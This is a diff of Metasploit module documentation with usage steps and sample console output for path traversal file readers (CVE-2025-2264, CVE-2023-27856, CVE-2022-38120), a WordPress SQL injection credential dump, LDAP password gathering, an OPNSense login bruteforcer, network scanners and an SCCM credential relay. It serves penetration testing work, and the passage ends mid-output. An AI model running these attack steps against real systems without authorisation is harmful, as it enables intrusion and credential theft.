+   LDAPUsername                   no        The username to authenticate with
+   RHOSTS                         no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT         389              no        The target port
+   THREADS       1                yes       The number of concurrent threads (max one per host)
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/ldap_passwords) > set RHOSTS 192.0.2.1
+RHOSTS => 192.0.2.1
+
+msf6 auxiliary(gather/ldap_passwords) > run
+[*] Discovered base DN: dc=vsp
+[*] The target LDAP server is not an Active Directory Domain Controller.
+[*] Searching base DN: dc=vsp
+[+] Credentials found: cust:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[+] Credentials found: admin:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[*] Found 2 entries and 2 credentials in 'dc=vsp'.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### NASDeluxe - NAS with Samba LM/NTLM hashes
+
+```
+msf6 auxiliary(gather/ldap_passwords) > set RHOSTS 192.0.2.1
+RHOSTS => 192.0.2.1
+
+msf5 auxiliary(gather/ldap_passwords) > run
+[*] Running module against 192.0.2.1
+
+[*] Discovered base DN: dc=server,dc=nas
+[*] The target LDAP server is not an Active Directory Domain Controller.
+[*] Searching base DN: dc=server,dc=nas
+[+] Credentials found: admin:209C6174DA490CAEB422F3FA5A7AE634
+[+] Credentials found: joe:58E8C758A4E67F34EF9C40944EB5535B
+[*] Found 2 entries and 2 credentials in 'dc=server,dc=nas'.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Windows Server 2019 - LAPSv2 with Encryption
+```
+msf6 auxiliary(gather/ldap_passwords) > run ldap://msflab.local;smcintyre:Password1!@192.0.2.10
+[*] Discovered base DN: DC=msflab,DC=local
+[*] The target LDAP server is an Active Directory Domain Controller.
+[*] Searching base DN: DC=msflab,DC=local
+[+] Credentials (password) found in mslaps-encryptedpassword: Administrator:m8L3A.LcZ9!lnT (expires: 2025-03-08 17:22:57 UTC)
+[*] Found 1 entries and 1 credentials in 'DC=msflab,DC=local'.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_passwords) >
+```
@@ -0,0 +1,68 @@
+## Vulnerable Application
+
+This module exploits a path traversal vulnerability in Sante PACS Server <= v4.1.0 (CVE-2025-2264) to read arbitrary files from the system.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://www.santesoft.com/win/sante-pacs-server/download.html).
+
+By default, the server listens on TCP port 3000 on all network interfaces.
+
+**Successfully tested on**
+
+- Sante PACS Server v4.1.0 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/gather/pacsserver_traversal
+msf6 auxiliary(gather/pacsserver_traversal) > set RHOSTS <IP>
+msf6 auxiliary(gather/pacsserver_traversal) > run
+```
+
+This should return the database for the web server. Any files retrieved will
+be stored as loot.
+
+## Options
+
+### FILE
+The file to be retrieved from the file system. By default, this is the database for the web server, HTTP.db. However, any arbitrary
+file can be specified.
+
+Example: /.HTTP/HTTP.db
+
+### DEPTH
+The traversal depth. The FILE path will be prepended with /assets/ + ../ * DEPTH.
+
+## Scenarios
+
+Running the exploit against v4.1.0 on Windows 22H22 should result in an output similar to the following:
+
+```
+msf6 auxiliary(gather/pacsserver_traversal) > run
+[*] Running module against 192.168.137.217
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[+] File retrieved: /assets/../../.HTTP/HTTP.db
+[*] File saved as loot.
+[*] Auxiliary module execution completed
+
+```
+
+The file will be stored as loot:
+
+```
+msf6 auxiliary(gather/upsmon_traversal) > loot
+
+Loot
+====
+
+host             service  type                         name                                 content     info                                               path
+----             -------  ----                         ----                                 -------     ----                                               ----
+192.168.137.217           pacsserver.file              /.HTTP/HTTP.db                       text/plain  File retrieved through PACS Server path traversal.  /home/foo/.msf4/loot/20250502165539_default_192.168.137.217_pacsserver.file_594385.txt
+```
@@ -0,0 +1,69 @@
+## Vulnerable Application
+
+This module exploits a path traversal vulnerability in ThinManager <= v13.0.1 (CVE-2023-27856) to download an arbitrary file from the
+system.
+
+The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.
+
+**Limitation**: Some files may get mangled by the application during transit.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://thinmanager.com/downloads/).
+
+**Successfully tested on**
+
+- ThinManager v13.0.1 on Windows 22H2
+- ThinManager v13.0.0 on Windows 22H2
+- ThinManager v12.1.5 on Windows 22H2
+- ThinManager v11.1.4 on Windows 22H2
+- ThinManager v10.0.2 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/gather/thinmanager_traversal_download 
+msf6 auxiliary(gather/thinmanager_traversal_download) > set RHOSTS <IP>
+msf6 auxiliary(gather/thinmanager_traversal_download) > set FILE <file to download>
+msf6 auxiliary(gather/thinmanager_traversal_download) > run
+```
+
+This should retrieve the file as specified through FILE from the remote server.
+
+## Options
+
+### FILE
+The file to download from the remote server.
+
+## Scenarios
+
+Running the exploit against ThinManager v13.0.1 on Windows 22H2 should result in an output similar to the following:
+
+```
+msf6 auxiliary(gather/thinmanager_traversal_download) > run
+[*] Running module against 192.168.137.227
+
+[*] 192.168.137.227:2031 - Running automatic check ("set AutoCheck false" to disable)
+[!] 192.168.137.227:2031 - The service is running, but could not be validated.
+[*] 192.168.137.227:2031 - Sending handshake...
+[*] 192.168.137.227:2031 - Received handshake response.
+[*] 192.168.137.227:2031 - Requesting /Windows/win.ini from 192.168.137.227
+[+] 192.168.137.227:2031 - Received response from target.
+[*] 192.168.137.227:2031 - File saved as loot: /home/asdf/.msf4/loot/20250506150022_default_192.168.137.227_thinmanager.file_334213.txt
+[*] Auxiliary module execution completed
+
+msf6 auxiliary(gather/thinmanager_traversal_download) > cat /home/asdf/.msf4/loot/20250506150027_default_192.168.137.227_thinmanager.file_381967.txt
+[*] exec: cat /home/asdf/.msf4/loot/20250506150027_default_192.168.137.227_thinmanager.file_381967.txt
+
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+```
@@ -0,0 +1,86 @@
+## Vulnerable Application
+
+This module exploits a path traversal vulnerability in UPSMON PRO <= v2.61 (CVE-2022-38120) to read arbitrary files from the system.
+By default, the configuration file will be retrieved, which contains the credentials (CVE-2022-38121) for the web service, mail server,
+application, and SMS service.
+However, any arbitrary file can be specified.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://www.upspowercom.com/PRO-Windows.jsp).
+
+The web server is disabled by default and needs to be enabled first. In the menu, go to Configuration > UPS Connect, and enable the Web
+Server checkbox.
+By default, the server listens on TCP port 8000 on all network interfaces and runs in the context of NT AUTHORITY\SYSTEM.
+
+**Successfully tested on**
+
+- UPSMON PRO v2.61 on Windows 22H2
+- UPSMON PRO v2.57 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Enable the Web Server module
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/gather/upsmon_traversal
+msf6 auxiliary(gather/upsmon_traversal) > set RHOSTS <IP>
+msf6 auxiliary(gather/upsmon_traversal) > run
+```
+
+This should return the UPSMON PRO configuration file, UPSMON.ini, which contains various cleartext credentials. Any files retrieved will
+be stored as loot.
+
+## Options
+
+### FILE
+The file to be retrieved from the file system. By default, this is the UPSMON PRO configuration file, UPSMON.ini. However, any arbitrary
+file can be specified.
+
+Example: /Users/Public/UPSMON-Pro/UPSMON.ini
+
+### DEPTH
+The traversal depth. The FILE path will be prepended with ../ * DEPTH.
+
+## Scenarios
+
+Running the exploit against v2.61 on Windows 22H22 should result in an output similar to the following:
+
+```
+msf6 auxiliary(gather/upsmon_traversal) > run
+[*] Running module against 192.168.137.218
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[+] File retrieved: ../../../../Users/Public/UPSMON-Pro/UPSMON.ini
+[*] UPSMON.ini specified, parsing credentials:
+[*] SMTP: (not configured)
+[*] Port: 25
+[*] Email UserName: (not configured)
+[*] Email Password: (not configured)
+[*] WebServer UserName: UPSMON
+[*] WebServer Password: UPSMON
+[*] Main AppPassword: UPSMON
+[*] SMS UserName: (not configured)
+[*] SMS Password: (not configured)
+[*] UPS Name: (not configured)
+[*] Phone Number: (not configured)
+[*] File saved as loot.
+[*] Auxiliary module execution completed
+```
+
+The file will be stored as loot:
+
+```
+msf6 auxiliary(gather/upsmon_traversal) > loot
+
+Loot
+====
+
+host             service  type                         name                                 content     info                                               path
+----             -------  ----                         ----                                 -------     ----                                               ----
+192.168.137.218           upsmonpro.file               /USERS/public/upsmon-pro/upsmon.ini  text/plain  File retrieved through UPSMON PRO path traversal.  /home/foo/.msf4/loot/20250502145519_default_192.168.137.218_upsmonpro.file_396058.txt
+```
@@ -6,7 +6,7 @@ This module uses an anonymous-bind LDAP connection to dump data from
 the vmdir service in VMware vCenter Server version 6.7 prior to the
 6.7U3f update, only if upgraded from a previous release line, such as
 6.0 or 6.5.
-If the bind username and password are provided (BIND_DN and BIND_PW
+If the bind username and password are provided (BIND_DN and LDAPPassword
 options), these credentials will be used instead of attempting an
 anonymous bind.

@@ -36,18 +36,33 @@ If you already have the LDAP base DN, you may set it in this option.
 ### VMware vCenter Server 6.7 virtual appliance on ESXi

 ```
-msf5 > use auxiliary/gather/vmware_vcenter_vmdir_ldap
-msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > options
+msf6 auxiliary(gather/vmware_vcenter_vmdir_ldap) > show options

-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   BASE_DN                    no        LDAP base DN if you already have it
-   DOMAIN                     no        The domain to authenticate to
-   PASSWORD                   no        The password to authenticate with
-   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT     636              yes       The target port
-   SSL       true             no        Enable SSL on the LDAP connection
-   USERNAME                   no        The username to authenticate with
+Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   BASE_DN                   no        LDAP base DN if you already have it
+   SSL      true             no        Enable SSL on the LDAP connection
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LDAPDomain                     no        The domain to authenticate to
+   LDAPPassword                   no        The password to authenticate with
+   LDAPUsername                   no        The username to authenticate with
+   RHOSTS                         no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                            metasploit.html
+   RPORT         636              no        The target port


 Auxiliary action:
@@ -57,6 +72,8 @@ Auxiliary action:
   Dump  Dump all LDAP data


+
+View the full module info with the info, or info -d command.
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts [redacted]
 rhosts => [redacted]
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > run
@@ -0,0 +1,136 @@
+## Vulnerable Application
+
+The vulnerability affects the **Slider & Popup Builder by Depicter** plugin for WordPress,
+versions **up to 3.6.1**, allowing **unauthenticated SQL injection** via the `s` parameter on `admin-ajax.php`.
+WordPress itself must be installed.
+
+### Pre-requisites
+
+* **Docker** and **Docker Compose** installed.
+
+
+## Setup Instructions
+
+1. **Create a `docker-compose.yml`** with:
+
+```yaml
+version: '3.1'
+
+   services:
+     wordpress:
+       image: wordpress:latest
+       restart: always
+       ports:
+         - 5555:80
+       environment:
+         WORDPRESS_DB_HOST: db
+         WORDPRESS_DB_USER: chocapikk
+         WORDPRESS_DB_PASSWORD: dummy_password
+         WORDPRESS_DB_NAME: exploit_market
+       mem_limit: 512m
+       volumes:
+         - wordpress:/var/www/html
+
+     db:
+       image: mysql:5.7
+       restart: always
+       environment:
+         MYSQL_DATABASE: exploit_market
+         MYSQL_USER: chocapikk
+         MYSQL_PASSWORD: dummy_password
+         MYSQL_RANDOM_ROOT_PASSWORD: '1'
+       volumes:
+         - db:/var/lib/mysql
+
+   volumes:
+     wordpress:
+     db:
+```
+
+2. **Start the environment**
+
+```bash
+docker-compose up -d
+```
+
+3. **Install Depicter plugin**
+
+```bash
+wget https://downloads.wordpress.org/plugin/depicter.3.6.1.zip
+unzip depicter.3.6.1.zip
+docker cp depicter wordpress:/var/www/html/wp-content/plugins/
+```
+
+4. **Activate Depicter**
+
+* Browse to `http://localhost:5555/wp-admin`, log in as admin (create one if needed), and activate **Slider & Popup Builder by Depicter**.
+* No additional setup is required.
+
+
+## Verification Steps
+
+1. **Launch Metasploit**
+
+```bash
+msfconsole
+```
+
+2. **Load the Depicter SQLi scanner**
+
+```bash
+use auxiliary/gather/wp_depicter_sqli_cve_2025_2011
+set RHOSTS 127.0.0.1
+set RPORT 5555
+set TARGETURI /
+```
+
+3. **Run the module**
+
+```bash
+run
+```
+
+4. **Observe output**
+
+The module should:
+
+* Retrieve the database name
+* Enumerate tables and infer the `wp_users` table
+* Extract `user_login:user_pass` for the number of rows set by `COUNT`
+
+## Options
+
+* **TARGETURI** (`/`): base path to WordPress
+* **COUNT** (`1`): number of user rows to retrieve
+
+## Scenarios
+
+```bash
+msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > exploit
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] {SQLi} Executing (select 'bEJ')
+[*] {SQLi} Encoded to (select 0x62454a)
+[+] The target is vulnerable.
+[*] {SQLi} Executing (SELECT 15 FROM information_schema.tables WHERE table_name = 'wp_users')
+[*] {SQLi} Encoded to (SELECT 15 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
+[*] {WPSQLi} Retrieved default table prefix: 'wp_'
+[*] {SQLi} Executing (select group_concat(DCdo) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) DCdo from wp_users limit 1) ofAGxxQl)
+[*] {SQLi} Encoded to (select group_concat(DCdo) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0xa,0)),ifnull(user_pass,repeat(0x2,0))) as binary) DCdo from wp_users limit 1) ofAGxxQl)
+[!] No active DB -- Credential data will not be saved!
+[+] {WPSQLi} Credential for user 'chocapikk' created successfully.
+[*] {WPSQLi} Dumped user data:
+wp_users
+========
+
+    user_login  user_pass
+    ----------  ---------
+    chocapikk   $wp$2y$10$rc5oXfNPG.bYSnbYvELKZeGgoQ9.QHcAXG8U/xunfXzsviMQkiPga
+
+[+] Loot saved to: /home/chocapikk/.msf4/loot/20250521182202_default_127.0.0.1_wordpress.users_171366.txt
+[*] {WPSQLi} Reporting host...
+[*] {WPSQLi} Reporting service...
+[*] {WPSQLi} Reporting vulnerability...
+[+] {WPSQLi} Reporting completed successfully.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,48 @@
+## Description
+
+This module is not intended to exploit a vulnerability, but rather to perform host discovery on IPv6-enabled local networks. It sends ICMPv6 Echo Requests to several well-known multicast addresses (e.g., FF02::1) and listens for any ICMPv6-based response.
+
+This technique helps identify active IPv6 hosts and services, particularly when traditional IPv4 reconnaissance is limited or disabled. All responses — including Echo Replies, Neighbor Solicitations, and others — are valid evidence of a live host.
+
+## Verification Steps
+
+1. Do: `use auxiliary/scanner/discovery/ipv6_neighbor`
+2. Do: `set RHOSTS [IP]`
+3. Do: `set SHOST [IP]`
+4. Do: `run`
+
+## Scenarios
+```
+msf6 auxiliary(scanner/discovery/ipv6_multicast_ping) > set SHOST 10.0.2.4
+SHOST => 10.0.2.4
+msf6 auxiliary(scanner/discovery/ipv6_multicast_ping) > set RHOST 10.0.2.2-10RHOST => 10.0.2.2-10
+msf6 auxiliary(scanner/discovery/ipv6_multicast_ping) > run
+[*] Running module against 10.0.2.2
+[*] Sending multicast pings...
+[*] Listening for responses...
+[*] Running module against 10.0.2.3
+[*] Sending multicast pings...
+[*] Listening for responses...
+[*] Running module against 10.0.2.4
+[*] Sending multicast pings...
+[*] Listening for responses...
+[*] Running module against 10.0.2.5
+[*] Sending multicast pings...
+[*] Listening for responses...
+[*] Running module against 10.0.2.6
+[*] Sending multicast pings...
+[*] Listening for responses...
+[*] Running module against 10.0.2.7
+[*] Sending multicast pings...
+[*] Listening for responses...
+[*] Running module against 10.0.2.8
+[*] Sending multicast pings...
+[*] Listening for responses...
+[*] Running module against 10.0.2.9
+[*] Sending multicast pings...
+[*] Listening for responses...
+[*] Running module against 10.0.2.10
+[*] Sending multicast pings...
+[*] Listening for responses...
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,22 @@
+## Description
+
+Detect common UDP services using sequential probes.
+
+## Verification Steps
+
+1. Do: `use auxiliary/scanner/discovery/udp_probe`
+2. Do: `set RHOSTS [IP]`
+5. Do: `set THREADS [number of threads]`
+6. Do: `run`
+
+## Scenarios
+
+```
+msf6 auxiliary(scanner/discovery/udp_probe) > use modules/auxiliary/scanner/discovery/udp_probe
+msf6 auxiliary(scanner/discovery/udp_probe) > set RHOSTS 10.0.3.5
+RHOSTS => 10.0.3.5
+msf6 auxiliary(scanner/discovery/udp_probe) > run
+[+] Discovered SNMP on 10.0.3.5:161 (Hardware: Intel64 Family 6 Model 142 Stepping 12 AT/AT COMPATIBLE - Software: Windows Version 6.1 (Build 7601 Multiprocessor Free))
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,37 @@
+## Description
+
+  This module identifies the existence of possible copies of a specific file in a given path.
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `set RHOSTS <rhost>`
+3. `set RPORT <rport>`
+4. `set PATH <filepath>`
+5. `run`
+
+
+## Scenarios
+
+```
+msf6 auxiliary(scanner/http/copy_of_file) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(scanner/http/copy_of_file) > set PATH /search_a_copy.txt
+PATH => /search_a_copy.txt
+msf6 auxiliary(scanner/http/copy_of_file) > run
+[*] Using code '404' as not found.
+[+] [127.0.0.1] Found http://127.0.0.1:80/Copy_(1)_of_search_a_copy.txt [200]
+[*] Using code '404' as not found.
+[+] [127.0.0.1] Found http://127.0.0.1:80/Copy_(2)_of_search_a_copy.txt [200]
+[*] Using code '400' as not found.
+[*] Using code '404' as not found.
+[+] [127.0.0.1] Found http://127.0.0.1:80/Copy_of_search_a_copy.txt [200]
+[*] Using code '404' as not found.
+[*] Using code '404' as not found.
+[+] [127.0.0.1] Found http://127.0.0.1:80/Copysearch_a_copy.txt [200]
+[*] Using code '404' as not found.
+[+] [127.0.0.1] Found http://127.0.0.1:80/_search_a_copy.txt [200]
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,72 @@
+# Jenkins Enumeration Auxiliary Module
+
+## Vulnerable Application
+This module performs unauthenticated enumeration on Jenkins servers. It attempts to discover the Jenkins version, identify unauthenticated accessible endpoints, and gather useful system information when possible.
+
+Jenkins servers that do not enforce strict authentication on certain URLs (such as `/script`) are susceptible to this enumeration. This module helps penetration testers quickly identify such information leakage.
+Jenkins instances may expose sensitive information through misconfigured endpoints. Many companies unintentionally leave URLs like /script and /manage open without authentication, allowing attackers to retrieve system details. If these endpoints return data, it’s a sign that authentication settings might need to be tightened.
+
+
+## Verification Steps
+1. Start `msfconsole`
+2. Use the module: `use auxiliary/scanner/http/jenkins_enum`
+3. Set the target(s) and other options: `set RHOSTS <target IP or CIDR>`, `set RPORT 8080`, `set TARGETURI /jenkins/`, etc
+4. Run the module: `run`
+5. You might see output similar to:
+
+``` 
+[+] 192.168.1.100:8080 - Jenkins Version: 2.319.1
+[+] 192.168.1.100:8080 - /script is accessible without authentication (HTTP 200)
+[+] 192.168.1.100:8080 - Enumerating plugins...
+[+] 192.168.1.100:8080 - Plugin detected: Git Plugin 4.11.3
+[+] 192.168.1.100:8080 - System Information:
+    OS: Linux
+    OS Version: 5.4.0-77-generic
+    Architecture: amd64
+    Jenkins Home: /var/lib/jenkins
+[*] 192.168.1.100:8080 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+## Options
+
+### RHOSTS
+Specifies the target host(s) or IP range to scan. You can input a single IP address, a range, or a CIDR subnet.
+Default: None (required)
+
+### RPORT
+Defines the target port for HTTP connections. Jenkins often runs on port 8080, but the default for this module is 80. Adjust accordingly.
+Default: 80
+
+### TARGETURI
+The base path of the Jenkins application on the target server. Usually /jenkins/ but can differ based on installation or proxy setup.
+Default: /jenkins/
+
+### THREADS
+The number of concurrent threads to use for faster scanning. Increasing this number can speed up scans but may generate more network traffic or load on the target.
+Default: 1
+
+### VHOST
+Specify a virtual host name for the HTTP Host header if Jenkins is running behind a virtual host or reverse proxy.
+Default: None
+
+## Scenarios
+This example demonstrates how to use the jenkins_enum module to enumerate information from a Jenkins server running on the local network at IP 192.168.1.100 on port 8080, where Jenkins is installed at the default /jenkins/ path.
+
+```
+msf6 > use auxiliary/scanner/http/jenkins_enum
+msf6 auxiliary(scanner/http/jenkins_enum) > set RHOSTS 192.168.1.100
+msf6 auxiliary(scanner/http/jenkins_enum) > set RPORT 8080
+msf6 auxiliary(scanner/http/jenkins_enum) > set TARGETURI /jenkins/
+msf6 auxiliary(scanner/http/jenkins_enum) > run
+
+[*] 192.168.1.100:8080 - Jenkins Version: 2.319.1
+[+] 192.168.1.100:8080 - /script is accessible without authentication (HTTP 200)
+[*] 192.168.1.100:8080 - Enumerating plugins...
+[+] 192.168.1.100:8080 - Plugin detected: Git Plugin 4.11.3
+[+] 192.168.1.100:8080 - Plugin detected: Matrix Authorization Strategy 2.6.7
+[+] 192.168.1.100:8080 - Plugin detected: Workflow CPS 2.92
+[*] 192.168.1.100:8080 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+The module retrieves the Jenkins version and installed plugins without requiring credentials, which can help identify vulnerable plugin versions or configuration weaknesses.
@@ -0,0 +1,111 @@
+## Vulnerable Application
+
+This module attempts to bruteforce credentials for OPNSense.
+
+This module was specifically tested on version 25.1 and 21.1, with older versions being unavailable from OPNSense mirrors.
+
+Note:
+
+By default, OPNSense comes with a built-in account named `root` with the password being `opnsense`.
+
+When performing too many login attempts, OPNSense will drop all packets coming from your IP, until the router is either:
+- Restarted
+- An anti-lockout rule is added
+
+## Verification Steps
+
+1. Set up an OPNSense VM or target a real installation
+1. Start `bundle exec ./msfconsole -q`
+1. `use auxiliary/scanner/http/opnsense_login`
+1. `set ssl true`
+1. `set pass_file ...`
+1. `set user_file ...`
+1. `run`
+1. or, using some example inline options:
+```
+run pass_file=data/wordlists/default_pass_for_services_unhash.txt \
+ user_file=data/wordlists/default_pass_for_services_unhash.txt \ 
+ STOP_ON_SUCCESS=true SSL=true rport=443
+```
+1. Verify you get a login:
+```
+[+] 192.168.207.158:443 - Login Successful: root:opnsense
+```
+
+## Options
+
+### BLANK_PASSWORD
+
+Set to `true` if an additional login attempt should be made with an empty password for every user.
+
+### BRUTEFORCE_SPEED
+
+How fast to bruteforce, from 0 to 5
+
+### PASSWORD
+
+A specific password to authenticate with
+
+### PASS_FILE
+
+File containing passwords, one per line
+
+### STOP_ON_SUCCESS
+
+Stop guessing when a credential works for a host
+
+### THREADS
+
+The number of concurrent threads (max one per host)
+
+### USERPASS_FILE
+
+File containing users and passwords separated by space, one pair per line
+
+### USER_FILE
+
+File containing usernames, one per line
+
+### VERBOSE
+
+Whether to print output for all attempts
+
+## Scenarios
+```
+msf6 auxiliary(scanner/http/opnsense_login) > options
+
+Module options (auxiliary/scanner/http/opnsense_login):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
+   BLANK_PASSWORDS   false            no        Try blank passwords for all users
+   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
+   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
+   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
+   DB_ALL_USERS      false            no        Add all users in the current database to the list
+   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
+   PASSWORD          opnsense         no        A specific password to authenticate with
+   PASS_FILE                          no        File containing passwords, one per line
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS            192.168.207.161  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT             443              yes       The target port (TCP)
+   SSL               true             yes       Negotiate SSL/TLS for outgoing connections
+   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
+   TARGETURI         /                yes       The base path to the OPNSense application
+   THREADS           1                yes       The number of concurrent threads (max one per host)
+   USERNAME          root             no        A specific username to authenticate as
+   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
+   USER_AS_PASS      false            no        Try the username as the password for all users
+   USER_FILE                          no        File containing usernames, one per line
+   VERBOSE           true             yes       Whether to print output for all attempts
+   VHOST                              no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/http/opnsense_login) > run
+[+] 192.168.207.161:443 - Login Successful: root:opnsense
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -10,7 +10,7 @@ on a given template.
    * See https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/overview.html#setting-up-a-esc8-vulnerable-host
 2. Start `msfconsole`
 2. Do: `use auxiliary/server/relay/esc8`
-3. Set the `RELAY_TARGETS` option to the AD CS Web Enrollment server
+3. Set the `RHOSTS` option to the AD CS Web Enrollment server
 4. Run the module and wait for a request to be relayed

 ## Options
@@ -0,0 +1,149 @@
+## Description
+This module creates an SMB server and then relays the credentials passed to it to SCCM's HTTP server (aka Management Point)
+to gain an authenticated connection. Once authenticated it then attempts to retrieve  the Network Access Account(s),
+if configured, from the SCCM server. This requires a computer account,  which can be added using the samr_account module.
+
+This module is essentially the `get_naa_credential` module with relaying capability.
+
+The NAA account is used by some SCCM configurations in the policy deployment process. It does not require many privileges, but
+in practice is often misconfigured to have excessive privileges.
+
+The account can be retrieved in various ways, many requiring local administrative privileges on an existing host. However,
+it can also be requested by an existing computer account, which by default most user accounts are able to create.
+
+
+## Vulnerable Application
+This module can be tested using the GOAD environment. Setup instructions can be found here:
+https://github.com/Orange-Cyberdefense/GOAD
+
+## Module usage
+The `admin/dcerpc/samr_computer` module is generally used to first create a computer account, which requires no permissions:
+
+1. From msfconsole
+1. Do: `use auxiliary/admin/dcerpc/samr_account`
+1. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   a. For the `ADD_COMPUTER` action, if you don't specify `ACCOUNT_NAME` or `ACCOUNT_PASSWORD` - one will be generated automatically
+   b. For the `DELETE_ACCOUNT` action, set the `ACCOUNT_NAME` option
+   c. For the `LOOKUP_ACCOUNT` action, set the `ACCOUNT_NAME` option
+1. Run the module and see that a new machine account was added
+
+Then use `ldap_query` to determine the `MANAGEMENT_POINT` and `SITE_CODE` values.
+
+1. Do: `use gather/ldap_query`
+1. Set: `DOMAIN` `RHOSTS` `USERNAME` `PASSWORD` `ACTION=RUN_SINGLE_QUERY` `QUERY_FILTER=(objectclass=mssmsmanagementpoint)` and `QUERY_ATTRIBUTES=cn,dnshostname,mssmssitecode`
+1. Run the module and note the `dnshostname` and `mssmssitecode` values
+
+
+Then the `auxiliary/server/relay/relay_get_naa_credentials` module can be used:
+
+1. `use server/relay/relay_get_naa_credentials`
+1. Set the `MANAGEMENT_POINT`, `SITE_CODE` 
+1. Run the module to obtain the NAA credentials, if present.
+
+The management point and site code can be retrieved using the `auxiliary/gather/ldap_query` module, using the `ENUM_SCCM_MANAGEMENT_POINTS` action.
+
+See the Scenarios for a more detailed walk through
+
+## Options
+
+### RHOST, USERNAME, PASSWORD, DOMAIN, SESSION, RHOST
+Options used to authenticate to the Domain Controller's LDAP service for SCCM autodiscovery.
+
+### MANAGEMENT_POINT
+The SCCM server.
+
+### SITE_CODE
+The Site Code of the management point.
+
+### TIMEOUT
+The number of seconds to wait for SCCM DB to update
+
+## Scenarios
+In the following example the user `ssccm.lab\eve` is a low-privilege user.
+
+### Creating computer account
+
+```
+msf6 auxiliary(admin/dcerpc/samr_account) > run rhost=192.168.33.10 domain=sccm.lab username=eve password=iloveyou
+[*] Running module against 192.168.33.10
+
+[*] 192.168.33.10:445 - Adding computer
+[+] 192.168.33.10:445 - Successfully created sccm.lab\DESKTOP-5FJM1832$
+[+] 192.168.33.10:445 -   Password: JpnYZ43YHqmoOLj9xBKdI9tVFgDXtfsu
+[+] 192.168.33.10:445 -   SID:      S-1-5-21-3875312677-2561575051-1173664991-1128
+[*] Auxiliary module execution completed
+```
+
+### Manual discovery of SITE_CODE and MANAGEMENT_POINT using domain credentials
+
+```
+msf6 auxiliary(gather/ldap_query) > run domain=sccm.lab rhosts=192.168.56.10 username=eve password=iloveyou action=RUN_SINGLE_QUERY QUERY_FILTER=(objectclass=mssmsmanagementpoint) QUERY_ATTRIBUTES=cn,dnshostname,mssmssitecode
+[*] Running module against 192.168.56.10
+[*] 192.168.56.10:389 Discovered base DN: DC=sccm,DC=lab
+[*] Sending single query (objectclass=mssmsmanagementpoint) to the LDAP server...
+CN=SMS-MP-P01-MECM.SCCM.LAB,CN=System Management,CN=System,DC=sccm,DC=lab
+=========================================================================
+
